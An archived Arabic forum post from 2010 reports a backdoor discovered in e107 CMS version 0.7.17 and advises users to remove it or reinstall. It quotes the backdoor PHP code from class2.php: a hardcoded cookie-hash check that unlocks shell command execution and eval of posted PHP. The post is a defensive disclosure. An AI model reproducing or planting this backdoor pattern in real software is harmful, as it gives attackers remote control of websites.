الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

اكتشاف Backdoor في آخر إصدار من نظام إدارة المحتوى e107

بدأه cold0zero في 28 يناير 2010 · 0 رد · 17,950 مشاهدة · في الأخبار والنقاشات التقنية
مشاركة: واتساب X فيسبوك تيليجرام
#1

إذا كنت من هواة أنظمة إدارة المحتوى أو ما يعرف اختصارا بـ CMS و كنت أحد مستعملي نظام e107 فإنه يستحسن أن تتحقق من آخر إصدار من نظام e107 حيث أن تحاليل أثبتت احتواءه على Backdoor.

i_logo.png

حيث نصح Bogdan Calin العامل لدى Acunetix بتجنب استعمال الإصدار 0.7.17 التي صدرت حديثا لأنها تحوي الشيفرة التالية:

<P deactivatedstyle="text-align: left;">if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

…

if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}


في الملف class2.php .

و هو ما يعني استعمال لـ Cookie ثابت يسهل عملية اختراق النظام و الحصول على صلاحيات المدير.

من المرجح أن سبب وجود الـ Backdoor هو تعرض أحد الخوادم التي يُحمَّل منها النظام إلى تغيير في المحتوى.

إذا كنت تستعمل هذا النظام و كنت قد نصبت هذا الإصدار، كل ما عليك هو حذف الشيفرة المبنية أعلاه من الملف المصاب، أو إعادة تحميل النظام من جديد و الذي تم تصحيح الخلل فيه.

يمكن الإطلاع على تفاصيل الثغرة من هنا و هنا

- هل تستعمل أنظمة إدارة المحتوى بصفة عامة و نظام e107 خاصة ؟

- هل أنت من مؤيدي أنظمة أدارة المحتوى؟ أم تفضل كتابة جميع صفحات موقعك من الصفر؟

http://feedproxy.goo...~3/M82ZZmc3vwc/

تم تعديل هذه المشاركة بواسطة طارق إبراهيم في 28 يناير 2010 في 10:46

مواضيع مشابهة

عدد الزوار حالياً

المتواجدون خلال آخر دقيقتين · يتحدّث كل ٣٠ ثانية

—الإجمالي—أعضاء مسجّلون—زوار بدون تسجيل

جارٍ التحقق من المتواجدين…